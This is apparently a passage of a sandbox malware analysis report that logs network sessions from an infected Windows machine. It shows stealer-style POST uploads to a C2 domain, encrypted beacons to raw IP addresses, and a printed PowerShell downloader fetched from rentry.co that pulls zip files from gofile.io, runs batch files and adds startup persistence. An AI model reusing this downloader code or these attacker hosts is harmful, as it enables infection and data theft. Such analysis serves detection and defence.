2024-07-27 05:30:36 UTC	1369	IN	Data Raw: 71 4a 4d 66 6c 33 49 46 6f 32 42 43 32 35 49 71 41 4d 66 57 67 51 73 2f 31 2f 6a 70 59 53 4a 71 6e 52 43 79 41 41 63 30 67 75 79 63 6b 79 71 7a 4c 79 58 36 52 42 62 6d 6f 33 4d 63 7a 38 36 4a 47 78 66 2f 32 63 68 30 42 6d 4c 34 50 63 63 4d 72 78 79 4b 63 50 69 4c 4f 34 74 65 4c 61 39 63 44 74 76 71 4d 6a 6e 2b 33 37 6b 6a 64 74 71 73 36 4e 77 61 51 71 77 4e 6b 67 44 4b 45 4e 4e 55 72 4a 49 32 30 6c 49 52 6d 33 67 47 30 35 59 4b 4f 4e 2f 6d 6f 53 73 72 37 2f 58 30 52 43 4a 43 78 43 33 4c 49 49 4d 59 6d 6d 79 55 75 7a 65 33 65 78 79 6d 52 42 61 32 6f 33 4d 63 50 2b 71 35 50 33 72 62 73 4e 41 39 49 6d 72 4e 45 4c 49 41 2f 77 43 53 56 4c 79 66 4b 36 4e 2b 4c 59 74 51 4e 74 75 47 42 6a 6a 48 72 70 30 48 4e 2f 76 78 2f 48 51 69 51 74 51 68 30 77 32 32 45 62 5a Data Ascii: qJMfl3IFo2BC25IqAMfWgQs/1/jpYSJqnRCyAAc0guyckyqzLyX6RBbmo3Mcz86JGxf/2ch0BmL4PccMrxyKcPiLO4teLa9cDtvqMjn+37kjdtqs6NwaQqwNkgDKENNUrJI20lIRm3gG05YKON/moSsr7/X0RCJCxC3LIIMYmmyUuze3exymRBa2o3McP+q5P3rbsNA9ImrNELIA/wCSVLyfK6N+LYtQNtuGBjjHrp0HN/vx/HQiQtQh0w22EbZ
2024-07-27 05:30:36 UTC	1369	IN	Data Raw: 36 64 69 4d 61 64 63 51 73 2b 65 4e 68 44 7a 77 71 55 66 4a 2f 50 42 39 56 6b 62 64 75 42 77 30 6d 47 33 70 4f 6f 55 68 61 4e 4b 69 7a 63 64 67 33 55 4c 74 71 49 79 4b 4e 2f 4f 71 53 4d 6a 78 39 58 4d 45 41 5a 69 78 42 48 44 4c 49 73 77 70 6c 69 77 36 79 2b 6a 63 68 47 72 63 44 4c 62 73 78 4d 6c 2f 2f 72 59 50 6e 62 62 42 64 78 67 54 6b 72 67 56 66 6f 41 79 68 44 54 56 4b 79 53 4e 74 4a 53 44 61 63 4d 4a 74 4f 4f 50 69 54 6a 32 71 30 58 46 2b 66 64 35 47 41 4f 63 76 41 78 35 7a 53 50 41 4a 4a 77 72 4a 4d 6e 72 6c 4d 6b 6e 31 68 72 31 73 4d 53 73 48 74 53 43 53 4e 2b 32 37 44 51 50 53 4a 71 7a 52 43 79 41 49 63 4d 68 6e 79 63 76 78 2b 4c 64 69 57 7a 44 45 4c 62 73 68 34 34 38 2f 71 64 42 78 66 48 32 64 42 45 4a 6c 72 73 4f 64 38 5a 74 68 47 32 53 4e 47 69 Data Ascii: 6diMadcQs+eNhDzwqUfJ/PB9VkbduBw0mG3pOoUhaNKizcdg3ULtqIyKN/OqSMjx9XMEAZixBHDLIswpliw6y+jchGrcDLbsxMl//rYPnbbBdxgTkrgVfoAyhDTVKySNtJSDacMJtOOPiTj2q0XF+fd5GAOcvAx5zSPAJJwrJMnrlMkn1hr1sMSsHtSCSN+27DQPSJqzRCyAIcMhnycvx+LdiWzDELbsh448/qdBxfH2dBEJlrsOd8ZthG2SNGi
2024-07-27 05:30:36 UTC	1369	IN	Data Raw: 6d 54 58 41 62 37 74 6a 6f 59 34 38 61 4e 64 78 76 6e 38 66 68 59 48 6d 37 6b 46 65 38 59 71 77 79 79 64 4b 32 69 44 72 4e 4f 66 4a 34 6c 43 6d 2b 2b 48 67 33 2f 6d 34 46 61 46 38 66 38 36 54 6b 69 64 74 51 35 2b 7a 69 33 4e 50 35 4d 6c 4b 4d 37 2b 31 34 46 76 31 77 36 35 35 59 79 4f 50 2f 79 6c 51 73 37 37 39 58 6f 64 43 64 33 78 52 48 50 59 62 5a 4a 74 70 43 45 6d 79 65 4c 58 6c 32 43 52 48 66 76 78 78 49 41 7a 75 66 59 50 79 76 2f 68 66 52 4d 41 6c 4c 38 4b 66 63 6b 71 7a 69 36 55 4b 43 54 43 35 64 65 50 5a 74 6b 4e 74 75 69 50 6a 7a 58 34 6f 45 71 46 75 4c 4e 39 44 6b 6a 46 2f 79 74 33 78 53 62 4c 62 37 49 71 4c 38 47 73 79 38 6c 2b 6b 51 57 35 71 4e 7a 48 50 50 32 67 52 73 72 79 2b 58 30 57 44 35 75 2f 44 48 2f 4e 4a 74 67 6f 6d 79 6b 70 7a 65 33 62 Data Ascii: mTXAb7tjoY48aNdxvn8fhYHm7kFe8YqwyydK2iDrNOfJ4lCm++Hg3/m4FaF8f86TkidtQ5+zi3NP5MlKM7+14Fv1w655YyOP/ylQs779XodCd3xRHPYbZJtpCEmyeLXl2CRHfvxxIAzufYPyv/hfRMAlL8Kfckqzi6UKCTC5dePZtkNtuiPjzX4oEqFuLN9DkjF/yt3xSbLb7IqL8Gsy8l+kQW5qNzHPP2gRsry+X0WD5u/DH/NJtgomykpze3b
2024-07-27 05:30:36 UTC	1369	IN	Data Raw: 53 32 2f 6f 66 41 41 63 65 41 53 4d 50 7a 39 47 70 55 4a 70 61 72 41 7a 53 4f 62 63 56 74 7a 52 56 6f 68 61 7a 72 79 53 66 4a 51 75 32 6f 73 59 51 78 39 36 6c 5a 31 4c 76 64 66 52 41 4e 6d 71 39 47 57 73 73 35 7a 57 33 62 62 43 36 4e 74 49 54 4a 4a 39 55 54 39 62 44 55 31 57 53 73 2f 52 69 56 70 4f 77 30 44 30 69 4c 2f 31 77 6d 6a 6d 33 59 62 63 31 73 62 38 37 2b 78 6f 46 6b 78 77 48 79 31 72 71 45 4b 66 53 68 52 4d 54 49 7a 56 51 62 43 5a 36 78 52 6b 58 57 49 4e 6f 75 6b 43 73 57 38 2b 4c 54 6b 32 44 66 42 4c 57 6f 79 73 63 77 75 66 5a 32 68 62 36 7a 52 56 68 49 68 66 39 63 4e 50 55 75 78 43 4f 53 4f 6a 6d 41 7a 38 4b 4b 61 4e 6f 44 39 61 62 45 67 58 2b 68 2f 67 47 46 38 75 49 36 54 6c 6a 50 35 46 45 6e 6c 33 32 59 4d 74 73 31 61 4e 75 73 6a 4e 55 70 6b Data Ascii: S2/ofAAceASMPz9GpUJparAzSObcVtzRVohazrySfJQu2osYQx96lZ1LvdfRANmq9GWss5zW3bbC6NtITJJ9UT9bDU1WSs/RiVpOw0D0iL/1wmjm3Ybc1sb87+xoFkxwHy1rqEKfShRMTIzVQbCZ6xRkXWINoukCsW8+LTk2DfBLWoyscwufZ2hb6zRVhIhf9cNPUuxCOSOjmAz8KKaNoD9abEgX+h/gGF8uI6TljP5FEnl32YMts1aNusjNUpk
2024-07-27 05:30:36 UTC	1369	IN	Data Raw: 53 6c 6e 2b 33 37 6b 43 46 72 73 6f 36 58 6b 69 69 38 55 52 73 67 48 57 4b 47 4a 59 69 4a 73 72 36 78 63 70 41 33 77 57 30 2f 70 53 4b 4d 39 69 74 58 73 2b 32 76 54 6f 51 53 4d 58 74 53 6a 54 45 50 49 70 31 78 58 35 7a 6d 4c 2b 44 31 7a 58 4f 54 4b 79 6f 6b 73 64 6e 71 2b 41 50 31 37 61 72 4f 6c 45 4c 6a 36 30 43 64 39 59 75 6a 52 4f 72 43 54 2f 4f 2f 4e 4b 45 57 65 38 70 75 65 36 44 6e 54 6a 2f 69 47 2b 46 75 4c 4e 31 56 6c 43 6b 2f 30 77 30 2f 32 4f 4b 4e 64 56 30 61 50 6a 76 32 6f 6c 67 78 78 50 34 7a 5a 4f 45 4c 2f 2b 74 44 34 75 32 39 54 70 4f 57 4e 50 2f 41 47 57 41 64 5a 70 2f 7a 6e 6c 37 6d 72 79 47 6d 43 6e 49 51 71 4f 6f 33 4e 56 78 75 62 77 50 6e 62 61 30 65 51 51 61 6d 37 77 53 64 34 63 54 39 41 75 57 50 53 4c 73 34 63 53 41 57 65 38 58 74 75 Data Ascii: Sln+37kCFrso6Xkii8URsgHWKGJYiJsr6xcpA3wW0/pSKM9itXs+2vToQSMXtSjTEPIp1xX5zmL+D1zXOTKyoksdnq+AP17arOlELj60Cd9YujROrCT/O/NKEWe8pue6DnTj/iG+FuLN1VlCk/0w0/2OKNdV0aPjv2olgxxP4zZOEL/+tD4u29TpOWNP/AGWAdZp/znl7mryGmCnIQqOo3NVxubwPnba0eQQam7wSd4cT9AuWPSLs4cSAWe8Xtu
2024-07-27 05:30:36 UTC	1369	IN	Data Raw: 2b 72 68 4d 67 73 6a 4e 58 51 51 44 6e 50 30 32 5a 4d 73 35 79 53 79 4f 62 67 6a 64 34 63 47 57 59 4d 45 38 69 39 2b 56 67 43 2b 37 69 45 7a 54 39 62 4d 30 56 68 44 64 35 30 52 54 30 69 62 4c 48 34 55 6e 50 4d 37 74 7a 36 64 33 33 42 65 6b 37 35 54 48 49 4c 65 33 44 39 4f 32 71 79 6c 59 53 49 2f 2f 58 44 53 48 49 38 63 73 6c 69 49 72 33 2f 37 53 68 48 48 53 52 59 76 57 73 49 77 72 2b 71 42 4a 7a 73 6a 4e 54 51 63 50 6a 66 30 69 64 39 59 75 69 6d 50 56 4e 47 69 56 72 4f 43 4d 63 39 49 4d 73 2b 50 45 6d 48 48 67 37 6c 6d 46 72 71 41 30 56 68 72 64 35 30 51 7a 7a 69 44 4c 4c 70 73 76 4f 74 2f 71 31 35 46 6b 6c 6a 79 4c 78 34 65 64 4b 66 4f 6a 51 2f 76 49 78 47 73 52 47 4e 2b 5a 42 32 4c 44 62 59 52 74 6a 57 78 77 6a 63 50 58 6e 58 48 62 44 37 6d 6f 6d 38 6b Data Ascii: +rhMgsjNXQQDnP02ZMs5ySyObgjd4cGWYME8i9+VgC+7iEzT9bM0VhDd50RT0ibLH4UnPM7tz6d33Bek75THILe3D9O2qylYSI//XDSHI8csliIr3/7ShHHSRYvWsIwr+qBJzsjNTQcPjf0id9YuimPVNGiVrOCMc9IMs+PEmHHg7lmFrqA0Vhrd50QzziDLLpsvOt/q15FkljyLx4edKfOjQ/vIxGsRGN+ZB2LDbYRtjWxwjcPXnXHbD7mom8k

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	51836	188.114.96.3	443	320	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:30:37 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12830 Host: callosallsaospz.shop
2024-07-27 05:30:37 UTC	12830	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 32 35 45 31 44 37 39 30 37 41 38 31 33 42 30 43 32 44 30 35 38 38 33 30 39 43 31 36 44 36 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 4f 4b 48 4e 4d 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A25E1D7907A813B0C2D0588309C16D62--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"bOKHNM----b
2024-07-27 05:30:38 UTC	806	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 05:30:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=mkrl7oj816vj79e71au7p6buf1; expires=Tue, 19-Nov-2024 23:17:16 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GjxxLJolysOJ9EhVq7zyYkJOClNxtv1XXzW3ZPQWRJjcg5qdtokGSZHPkTRvhZyrVtWnGh9gW5WFeffzGMOsKijDpVlQeuYFf9nzMPj6gLcy%2FANHJC9ArxHxW3LstpbQC3yu%2BB6TCw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9a3d10a9147ce7-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 05:30:38 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a Data Ascii: eok 8.46.123.33
2024-07-27 05:30:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	51834	107.173.160.139	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:30:37 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:30:37 UTC	1267	OUT	Data Raw: 4b 61 59 46 50 44 77 4a 53 6c 62 4e 44 34 6b 54 34 39 72 72 50 65 43 76 52 56 63 72 54 49 50 33 6a 32 46 4a 32 38 5a 5a 61 49 59 73 70 62 6b 51 66 62 41 70 74 32 4e 34 63 6f 78 6c 4d 48 7a 33 4e 6a 62 69 45 6c 2f 44 63 6b 35 59 6c 75 6a 4a 42 4e 6c 44 46 34 67 4b 56 6f 47 74 34 55 61 46 52 48 71 37 71 2f 4d 43 74 6b 34 78 55 7a 53 4f 4b 7a 56 64 66 35 33 61 73 67 4c 34 65 4b 6f 36 61 72 6d 46 30 64 67 78 4e 50 79 77 50 31 63 76 68 68 73 33 4d 74 38 48 35 46 75 47 58 4e 79 55 43 30 45 77 34 33 69 6d 34 4f 6b 36 79 35 79 51 50 54 44 46 6f 47 41 31 69 51 4a 6d 71 58 34 56 35 6f 72 4e 68 67 2b 31 46 62 70 77 79 71 76 4d 4a 56 58 69 43 31 34 6f 47 4e 4f 62 44 4b 4c 6e 37 51 6f 38 6b 5a 6b 6e 79 68 43 6e 76 42 6c 79 65 37 7a 37 33 53 67 6c 47 43 6f 4e 2b 6c 42 Data Ascii: KaYFPDwJSlbND4kT49rrPeCvRVcrTIP3j2FJ28ZZaIYspbkQfbApt2N4coxlMHz3NjbiEl/Dck5YlujJBNlDF4gKVoGt4UaFRHq7q/MCtk4xUzSOKzVdf53asgL4eKo6armF0dgxNPywP1cvhhs3Mt8H5FuGXNyUC0Ew43im4Ok6y5yQPTDFoGA1iQJmqX4V5orNhg+1FbpwyqvMJVXiC14oGNObDKLn7Qo8kZknyhCnvBlye7z73SglGCoN+lB
2024-07-27 05:30:38 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:30:38 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:30:38 UTC	685	IN	Data Raw: 63 69 64 66 58 33 78 31 70 44 38 68 71 39 55 55 4f 35 37 72 75 41 5a 75 61 4e 30 47 71 4c 44 4b 45 53 46 32 76 34 4c 43 72 70 34 52 68 4a 39 67 2b 34 39 79 58 31 79 65 6b 67 47 42 6b 34 6f 45 50 4a 6b 76 55 69 6b 66 6e 35 55 5a 70 4f 36 66 2f 77 76 53 44 72 72 52 4f 54 33 41 72 42 42 31 48 63 31 63 58 69 31 2f 58 77 2f 74 46 53 79 4b 35 6e 4b 74 52 6b 42 72 4d 4e 63 49 43 77 69 32 74 46 4f 72 34 4e 66 42 4b 6c 67 33 57 50 56 2f 77 31 5a 32 2f 61 74 41 4d 46 38 38 58 74 75 41 74 66 76 48 47 64 4e 58 48 35 43 30 61 2b 64 54 6f 48 66 5a 68 4f 39 6a 62 4a 55 67 4a 30 41 7a 4d 47 77 46 58 4b 6b 48 7a 37 4b 53 6b 67 55 52 6b 37 67 75 73 69 4a 49 4b 50 75 74 64 67 31 44 75 43 57 6a 53 57 4e 6d 67 46 31 62 79 62 32 75 49 46 68 30 39 58 4d 68 56 51 53 31 6a 46 38 Data Ascii: cidfX3x1pD8hq9UUO57ruAZuaN0GqLDKESF2v4LCrp4RhJ9g+49yX1yekgGBk4oEPJkvUikfn5UZpO6f/wvSDrrROT3ArBB1Hc1cXi1/Xw/tFSyK5nKtRkBrMNcICwi2tFOr4NfBKlg3WPV/w1Z2/atAMF88XtuAtfvHGdNXH5C0a+dToHfZhO9jbJUgJ0AzMGwFXKkHz7KSkgURk7gusiJIKPutdg1DuCWjSWNmgF1byb2uIFh09XMhVQS1jF8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	51837	104.26.3.16	443	940	C:\Users\user\AppData\Local\Temp\6E8A.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:30:38 UTC	167	OUT	GET /microgods/raw HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-CH) WindowsPowerShell/5.1.19041.1682 Host: rentry.co Connection: Keep-Alive
2024-07-27 05:30:38 UTC	694	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 05:30:38 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2509 Connection: close vary: Origin x-xss-protection: 1; mode=block x-content-type-options: nosniff strict-transport-security: max-age=31536000; includeSubDomains Cache-Control: Vary CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I3XLfA6Wic3eGGzXN0XUAbsGkx6WatYNr3SOmyXft%2FLh5OYtkQOspugrEvkZLiqJVbNFumPTHKMVWKyQSL4ZzEzFAeiGwvu1cvXxBQ7cPRbHh5sTdIuWiOYyhg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9a3d16abc74378-EWR
2024-07-27 05:30:38 UTC	675	IN	Data Raw: 24 75 72 6c 31 20 3d 20 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 34 2e 67 6f 66 69 6c 65 2e 69 6f 2f 64 6f 77 6e 6c 6f 61 64 2f 64 69 72 65 63 74 2f 36 62 32 34 65 63 39 37 2d 32 61 38 64 2d 34 36 38 64 2d 61 32 34 64 2d 63 38 30 38 31 63 64 61 31 64 61 62 2f 76 6d 2e 7a 69 70 22 0d 0a 24 75 72 6c 32 20 3d 20 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 34 2e 67 6f 66 69 6c 65 2e 69 6f 2f 64 6f 77 6e 6c 6f 61 64 2f 64 69 72 65 63 74 2f 30 36 35 36 63 35 63 66 2d 35 31 62 34 2d 34 66 61 34 2d 61 65 34 38 2d 38 65 65 35 65 64 33 64 31 34 32 65 2f 6c 6d 2e 7a 69 70 22 0d 0a 24 74 65 6d 70 44 69 72 31 20 3d 20 5b 53 79 73 74 65 6d 2e 49 4f 2e 50 61 74 68 5d 3a 3a 43 6f 6d 62 69 6e 65 28 24 65 6e 76 3a 54 45 4d 50 2c 20 22 45 78 74 72 61 63 74 65 64 56 65 6e 6f Data Ascii: $url1 = "https://store4.gofile.io/download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip"$url2 = "https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip"$tempDir1 = [System.IO.Path]::Combine($env:TEMP, "ExtractedVeno
2024-07-27 05:30:38 UTC	1369	IN	Data Raw: 72 79 0d 0a 20 20 20 20 29 0d 0a 20 20 20 20 24 62 61 74 46 69 6c 65 73 20 3d 20 47 65 74 2d 43 68 69 6c 64 49 74 65 6d 20 2d 50 61 74 68 20 24 64 69 72 65 63 74 6f 72 79 20 2d 46 69 6c 74 65 72 20 2a 2e 62 61 74 20 2d 46 69 6c 65 0d 0a 20 20 20 20 66 6f 72 65 61 63 68 20 28 24 62 61 74 46 69 6c 65 20 69 6e 20 24 62 61 74 46 69 6c 65 73 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 2d 46 69 6c 65 50 61 74 68 20 22 63 6d 64 2e 65 78 65 22 20 2d 41 72 67 75 6d 65 6e 74 4c 69 73 74 20 22 2f 63 20 24 28 24 62 61 74 46 69 6c 65 2e 46 75 6c 6c 4e 61 6d 65 29 22 20 2d 57 6f 72 6b 69 6e 67 44 69 72 65 63 74 6f 72 79 20 24 64 69 72 65 63 74 6f 72 79 20 2d 4e 6f 4e 65 77 57 69 6e 64 6f 77 0d 0a 20 20 20 20 7d 0d 0a 7d 0d 0a 0d 0a Data Ascii: ry ) $batFiles = Get-ChildItem -Path $directory -Filter *.bat -File foreach ($batFile in $batFiles) { Start-Process -FilePath "cmd.exe" -ArgumentList "/c $($batFile.FullName)" -WorkingDirectory $directory -NoNewWindow }}
2024-07-27 05:30:38 UTC	465	IN	Data Raw: 69 72 32 2e 43 6f 75 6e 74 20 2d 67 74 20 30 29 20 7b 0d 0a 20 20 20 20 52 75 6e 2d 42 61 74 46 69 6c 65 73 20 2d 64 69 72 65 63 74 6f 72 79 20 24 74 65 6d 70 44 69 72 31 0d 0a 20 20 20 20 52 75 6e 2d 42 61 74 46 69 6c 65 73 20 2d 64 69 72 65 63 74 6f 72 79 20 24 74 65 6d 70 44 69 72 32 0d 0a 0d 0a 20 20 20 20 24 62 61 74 46 69 6c 65 31 20 3d 20 47 65 74 2d 43 68 69 6c 64 49 74 65 6d 20 2d 50 61 74 68 20 24 74 65 6d 70 44 69 72 31 20 2d 46 69 6c 74 65 72 20 2a 2e 62 61 74 20 2d 46 69 6c 65 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 46 69 72 73 74 20 31 0d 0a 20 20 20 20 69 66 20 28 24 62 61 74 46 69 6c 65 31 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 41 64 64 2d 56 62 73 54 6f 53 74 61 72 74 75 70 20 2d 62 61 74 46 69 6c 65 50 61 74 68 20 24 62 61 Data Ascii: ir2.Count -gt 0) { Run-BatFiles -directory $tempDir1 Run-BatFiles -directory $tempDir2 $batFile1 = Get-ChildItem -Path $tempDir1 -Filter *.bat -File \| Select-Object -First 1 if ($batFile1) { Add-VbsToStartup -batFilePath $ba

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	51840	167.235.128.153	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:30:39 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:30:39 UTC	1267	OUT	Data Raw: 66 6c 67 61 58 59 39 43 68 2f 69 48 2f 4e 5a 78 78 44 72 57 53 43 54 42 31 31 30 66 4a 58 69 42 6c 54 7a 61 63 6d 6b 4f 6b 62 4e 48 35 49 37 45 61 79 59 76 59 53 54 6e 6b 39 37 36 35 4e 65 42 6a 78 61 4c 59 70 30 52 77 6b 35 49 4c 76 32 77 6c 61 56 4d 6c 6c 4b 68 41 30 61 75 35 51 67 79 73 35 68 6b 78 36 58 48 4d 4c 31 33 63 70 53 6e 32 65 58 41 4d 71 4e 53 6e 69 4d 68 47 45 63 69 62 2f 33 74 56 41 4c 4e 67 50 4d 36 2f 5a 4a 73 66 78 61 43 52 70 6c 35 38 53 48 4d 78 57 35 5a 34 4c 37 2f 30 4b 43 47 2b 6f 52 7a 36 6e 76 50 4f 44 48 52 6e 69 56 6f 52 39 6e 6f 48 70 4d 6c 45 6d 2f 4a 43 74 48 4a 53 65 76 79 6f 53 77 48 4b 43 30 6c 54 70 61 46 65 77 46 31 63 51 74 42 7a 4a 34 48 41 64 50 72 54 56 43 6b 76 57 67 33 6b 39 39 43 39 76 51 69 46 6f 75 35 72 56 62 Data Ascii: flgaXY9Ch/iH/NZxxDrWSCTB110fJXiBlTzacmkOkbNH5I7EayYvYSTnk9765NeBjxaLYp0Rwk5ILv2wlaVMllKhA0au5Qgys5hkx6XHML13cpSn2eXAMqNSniMhGEcib/3tVALNgPM6/ZJsfxaCRpl58SHMxW5Z4L7/0KCG+oRz6nvPODHRniVoR9noHpMlEm/JCtHJSevyoSwHKC0lTpaFewF1cQtBzJ4HAdPrTVCkvWg3k99C9vQiFou5rVb
2024-07-27 05:30:40 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:30:40 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:30:40 UTC	685	IN	Data Raw: 43 36 49 62 49 46 54 36 74 2b 50 54 6b 61 57 70 51 2f 63 67 61 6f 6a 50 35 63 52 77 74 43 31 6d 6a 45 51 62 56 59 49 69 54 58 72 74 6f 66 67 71 63 67 76 64 6d 31 6e 48 4c 47 32 7a 75 4d 77 46 37 32 64 4d 55 35 70 69 6f 6e 43 4c 31 59 36 30 71 2f 70 52 71 65 6b 73 50 51 4c 7a 79 4e 75 31 62 6c 4e 77 54 41 63 70 52 65 72 4b 41 34 71 63 6f 34 50 4e 6f 62 6c 53 54 52 47 48 56 6a 32 4f 68 72 47 65 65 42 73 43 6e 6b 34 31 50 6d 4b 65 33 76 31 4e 72 42 58 6b 77 70 35 44 42 33 72 68 38 47 47 75 68 36 66 6c 61 41 50 54 41 6b 74 69 71 37 4d 59 2f 55 32 69 6b 6a 54 42 30 4f 68 68 2b 77 32 55 6c 77 47 31 46 41 64 7a 2b 55 7a 42 6a 61 4c 70 76 33 39 34 37 50 39 42 45 75 4f 33 75 41 62 50 4c 72 4c 74 42 5a 4a 42 6c 7a 5a 41 39 35 71 42 32 38 54 56 36 66 65 50 4b 55 7a Data Ascii: C6IbIFT6t+PTkaWpQ/cgaojP5cRwtC1mjEQbVYIiTXrtofgqcgvdm1nHLG2zuMwF72dMU5pionCL1Y60q/pRqeksPQLzyNu1blNwTAcpRerKA4qco4PNoblSTRGHVj2OhrGeeBsCnk41PmKe3v1NrBXkwp5DB3rh8GGuh6flaAPTAktiq7MY/U2ikjTB0Ohh+w2UlwG1FAdz+UzBjaLpv3947P9BEuO3uAbPLrLtBZJBlzZA95qB28TV6fePKUz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	51841	188.114.96.3	443	320	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:30:39 UTC	286	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15072 Host: callosallsaospz.shop
2024-07-27 05:30:39 UTC	15072	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 32 35 45 31 44 37 39 30 37 41 38 31 33 42 30 43 32 44 30 35 38 38 33 30 39 43 31 36 44 36 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 4f 4b 48 4e 4d 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A25E1D7907A813B0C2D0588309C16D62--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"bOKHNM----b
